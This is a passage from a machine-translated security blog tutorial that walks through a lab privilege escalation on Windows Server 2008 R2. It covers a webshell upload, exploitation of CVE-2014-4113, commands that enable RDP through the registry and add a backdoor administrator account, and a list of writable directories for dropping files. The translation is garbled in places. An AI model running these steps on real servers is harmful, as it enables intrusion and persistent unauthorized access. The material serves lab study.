当前位置:网站首页>111. Network security penetration test - [privilege escalation 9] - [windows 2008 R2 kernel overflow privilege escalation]
111. Network security penetration test - [privilege escalation 9] - [windows 2008 R2 kernel overflow privilege escalation]
2022-07-07 12:03:00 【qwsn】
In my submission , Whether studying safety or engaging in safety , More or less, I have some feelings and sense of mission !!!
List of articles
One 、Windows Kernel overflow rights [2008]
1、 Background of kernel overflow rights :
stay winserver2008 R2 in , By default, the server supports aspx Of . So by default, you can execute some commands . If there is no patch, you can use some overflow rights raising tools , Right to raise .
2、CVE-2014-4113-Exploit
This version of the rights raising tool , It can be done to winserver2008 The system carries out overflow and right lifting
3、 Kernel overflow authorization process :
(1) Experimental environment :
1. Target environment :
(1) virtual machine Windows2008【target_sys.com】【192.168.97.131】
(2) Scripting language environment :php/asp The language environment exists
2. attack :
(1) virtual machine Win7【192.168.97.130】
(2)Firefox+Burpsuite+ Ant sword + Malaysia
3. The network environment :
(1)VMware Built NAT The Internet
(2) Target link :
URL:http://target_sys.com/upload.php
(3) Experimental process :
First step : Visit the target link , utilize MIME Break through the type limit of the white list , Upload up.aspx Malaysia
【 The above process is a little 】 The following is the right raising process :
The second step : Connect up.aspx Malaysia 【 The password for admin】, And click the [CmdShell] modular , call cmd.exe perform whoami command , View current user information , Discovery permissions are low
stay winserver2008 R2 in , By default, the server supports aspx Of . So by default, you can execute some commands :
The third step : Click on [CmdShell] modular , call cmd.exe perform systeminfo command , Copy the results , And then use it wes.py Script scanning vulnerability , But it didn't come out
Scan results : Scan fail
Step four : hold systeminfo Put your information into In this website , Retrieve relevant rights exp, Finally found CVE-2014-4113 Right can be raised . At the same time, we go through msfconsole, type search kernel
You can also retrieve some exp, Enter one by one and then type info, Found some are 2008R2 The right to raise exp, Image below ms14-058 It's corresponding to CVE-2014-4113.
Step five : Click on [File Manager] File management module , Upload rw.aspx Used to scan readable and writable folders
Step six : Visit the just uploaded rw.aspx Malaysia , Scan readable and writable folders
As shown in the figure below , We scanned some readable and writable folders , After incomplete testing , It is found that the root directory of the website can be used .
Step seven : Back to Malaysia just now , Upload CVE-2014-4113-Exploit Of exp To c:\inetpub\wwwroot\target_sys.com Next
Step eight : Click on [CmdShell] modular , call cmd Execute the just passed cve-2017-4113 Of exp, As shown below , Successful overflow
Step nine : Execute the following commands in turn , Turn on 3389 port , Add administrator group users demo1, Finally, connect the target remotely .
/c c:\inetpub\wwwroot\target_sys.com\Win64.exe "netstat -ano"
# View port status /c c:\inetpub\wwwroot\target_sys.com\Win64.exe "REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f"
# Turn on 3389/c c:\inetpub\wwwroot\target_sys.com\Win64.exe "netstat -ano"
# Verify that it is on 3389
/c c:\inetpub\wwwroot\target_sys.com\Win64.exe "net user demo1 123 /add"
# Add users demo1/213/c c:\inetpub\wwwroot\target_sys.com\Win64.exe "net localgroup administrators demo1 /add"
# hold demo1 Users join the administrators group
/c c:\inetpub\wwwroot\target_sys.com\Win64.exe "net user"
# verification demo1 Does the user exist
mstsc Remote Desktop Connection :
attach : Common read / write directories
≤2003 Read write table of contents
C:\RECYCLER\
D:\RECYCLER\
E:\RECYCLER\
C:\Windows\temp\
C:\Windows\Debug\
C:\Windows\Registration\CRMLog\
C:\Documents and Settings\All Users\Documents\
≥2008 Read write table of contents
C:\ProgramData\
C:\Windows\temp\
C:\Windows\Tasks\
C:\Windows\tracing\ // It can't be deleted
C:\Windows\debug\WIA\
C:\Windows\servicing\Sessions\
C:\Windows\servicing\Packages\
C:\Windows\Registration\CRMLog\
C:\Windows\System32\spool\drivers\color\
C:\Users\Default\AppData\ // It can't be deleted
C:\ProgramData\Microsoft\DeviceSync\
C:\ProgramData\Microsoft\Crypto\DSS\MachineKeys\
C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\
C:\ProgramData\Microsoft\User Account Pictures\ // It can't be deleted
C:\Users\All Users\Microsoft\NetFramework\BreadcrumbStore\ // It can't be deleted
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys\
C:\Windows\syswow64\tasks\microsoft\Windows\pla\system\
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Temporary ASP.NET Files\
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Temporary ASP.NET Files\
C:\Windows\System32\catroot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\
C:\Windows\System32\catroot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\
边栏推荐
- SwiftUI Swift 内功之 Swift 中使用不透明类型的 5 个技巧
- Suggestions on one-stop development of testing life
- Blog moved to Zhihu
- Software design - "high cohesion and low coupling"
- 千人規模互聯網公司研發效能成功之路
- 【系统设计】指标监控和告警系统
- <No. 9> 1805. 字符串中不同整数的数目 (简单)
- There are so many factors that imprison you
- How to write test cases for test coupons?
- 千人规模互联网公司研发效能成功之路
猜你喜欢
Flet教程之 14 ListTile 基础入门(教程含源码)
Problem: the string and characters are typed successively, and the results conflict
<No. 8> 1816. 截断句子 (简单)
Rationaldmis2022 array workpiece measurement
There are so many factors that imprison you
正在運行的Kubernetes集群想要調整Pod的網段地址
【神经网络】卷积神经网络CNN【含Matlab源码 1932期】
Flet教程之 18 Divider 分隔符组件 基础入门(教程含源码)
Up meta - Web3.0 world innovative meta universe financial agreement
Camera calibration (1): basic principles of monocular camera calibration and Zhang Zhengyou calibration
随机推荐
相机标定(2): 单目相机标定总结
110.网络安全渗透测试—[权限提升篇8]—[Windows SqlServer xp_cmdshell存储过程提权]
111.网络安全渗透测试—[权限提升篇9]—[Windows 2008 R2内核溢出提权]
La voie du succès de la R & D des entreprises Internet à l’échelle des milliers de personnes
Mastering the new functions of swiftui 4 weatherkit and swift charts
NPC Jincang was invited to participate in the "aerospace 706" I have an appointment with aerospace computer "national Partner Conference
Complete collection of common error handling in MySQL installation
HCIA复习整理
How much do you know about excel formula?
正在運行的Kubernetes集群想要調整Pod的網段地址
《通信软件开发与应用》课程结业报告
超标量处理器设计 姚永斌 第8章 指令发射 摘录
Up meta - Web3.0 world innovative meta universe financial agreement
Blog moved to Zhihu
Flet tutorial 17 basic introduction to card components (tutorial includes source code)
百度数字人度晓晓在线回应网友喊话 应战上海高考英语作文
112.网络安全渗透测试—[权限提升篇10]—[Windows 2003 LPK.DDL劫持提权&msf本地提权]
总结了200道经典的机器学习面试题(附参考答案)
问下flinkcdc2.2.0的版本,支持并发,这个并发是指多并行度吗,现在发现,mysqlcdc全
超标量处理器设计 姚永斌 第9章 指令执行 摘录